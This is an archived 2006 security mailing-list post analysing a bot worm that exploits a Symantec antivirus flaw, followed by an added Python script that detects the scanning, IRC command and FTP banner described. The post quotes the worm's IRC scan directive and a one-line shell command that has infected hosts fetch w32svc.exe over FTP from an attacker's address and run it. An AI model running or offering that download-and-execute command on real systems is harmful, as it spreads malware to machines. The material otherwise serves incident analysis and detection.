[unisog] Worm exploiting Symantec client defect?????
iglesias at uci.edu
Mon Nov 27 23:02:09 GMT 2006
Gary Flynn wrote:
> Anyone know anything more about what SANS
> is reporting on this?
Once a system connects to the bot controller, it gets a message like this (all
on one line):
#text :.asc -S -s |.asc rtvscan 100 5 0 128.x.x.x |.asc rtvscan 100 5 0 128.x.x.x
This appears to start a scan on ports 2967 and 6236. Port 2967 is the port
used by Symantec AV remote control; I haven't seen any traffic there once the
scanning system finds that port open so I can only guess that it attacks it to
try to exploit the vulnerability in Symantec AV that was announced in May.
Port 6236 appears to be some kind of command line backdoor left behind by a
successful exploitation of the Symantec AV bug, as the prompt that the
scanning system gets when it connects is "C:\Program Files\Symantec AntiVirus
>". If the scanning system finds port 6236 open, it sends this to it (again,
all on one line):
echo open <attacker's ip> 2100 > i&echo user 1 1 > > i &echo get
w32svc.exe > > i &echo quit > > i &ftp -As:i &w32svc.exe &exit
The scanning system has port 2100 open running a ftp server, and the system
with port 6236 open is told to go get w32svc.exe and run it. The ftp server
responds with "220 Reptile welcomes you.." when you connect to it. I haven't
been able to pull down a copy of w32svc.exe from one of these systems, so I
don't know if the ftp server is really working or not.
The Symantec advisory for the vulnerability is available at
Mike Iglesias Email: iglesias at uci.edu
University of California, Irvine phone: 949-824-6926
Network & Academic Computing Services FAX: 949-824-2069
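As an added example (not part of Mike's post or anything from unisog), here is a small Python detector for the three observable signals he describes: one host hitting many targets on 2967/6236, the ".asc rtvscan" directive in captured IRC text, and the "220 Reptile welcomes you.." FTP banner. The flow tuples, IRC lines, IP addresses and the scan threshold are constructed assumptions.

```python
# Added example, not from the original post: flag the worm behaviour the
# message describes, using constructed sample data (IPs/threshold assumed).
import re
from collections import defaultdict

SCAN_PORTS = {2967, 6236}           # Symantec AV remote control / shell backdoor
SCAN_THRESHOLD = 5                  # distinct targets per (source, port); assumed
FTP_BANNER = "220 Reptile welcomes you.."
BOT_CMD = re.compile(r"\.asc\s+rtvscan\b", re.IGNORECASE)

def find_scanners(flows, threshold=SCAN_THRESHOLD):
    """flows: iterable of (src_ip, dst_ip, dst_port).
    Returns {src_ip: [ports]} for sources that touched >= threshold
    distinct destinations on one of the ports of interest."""
    targets = defaultdict(set)
    for src, dst, port in flows:
        if port in SCAN_PORTS:
            targets[(src, port)].add(dst)
    hits = defaultdict(list)
    for (src, port), dsts in targets.items():
        if len(dsts) >= threshold:
            hits[src].append(port)
    return {src: sorted(ports) for src, ports in hits.items()}

def find_bot_commands(irc_lines):
    """Return captured IRC lines carrying the '.asc rtvscan' scan directive."""
    return [line for line in irc_lines if BOT_CMD.search(line)]

def is_reptile_banner(banner):
    """True if an FTP greeting matches the banner seen on the worm's server."""
    return banner.strip().startswith(FTP_BANNER)

# Constructed sample data (RFC 1918 addresses, not real observations).
SAMPLE_FLOWS = (
    [("10.0.0.5", f"10.0.1.{i}", 2967) for i in range(1, 9)]
    + [("10.0.0.5", f"10.0.1.{i}", 6236) for i in range(1, 6)]
    + [("10.0.0.7", "10.0.1.2", 2967), ("10.0.0.7", "10.0.1.3", 445)]
)
SAMPLE_IRC = [
    "#text :.asc -S -s |.asc rtvscan 100 5 0 10.x.x.x",
    "PRIVMSG #chan :hello",
]

if __name__ == "__main__":
    print("scanners:", find_scanners(SAMPLE_FLOWS))
    print("bot commands:", find_bot_commands(SAMPLE_IRC))
    print("banner match:", is_reptile_banner("220 Reptile welcomes you..\r\n"))
```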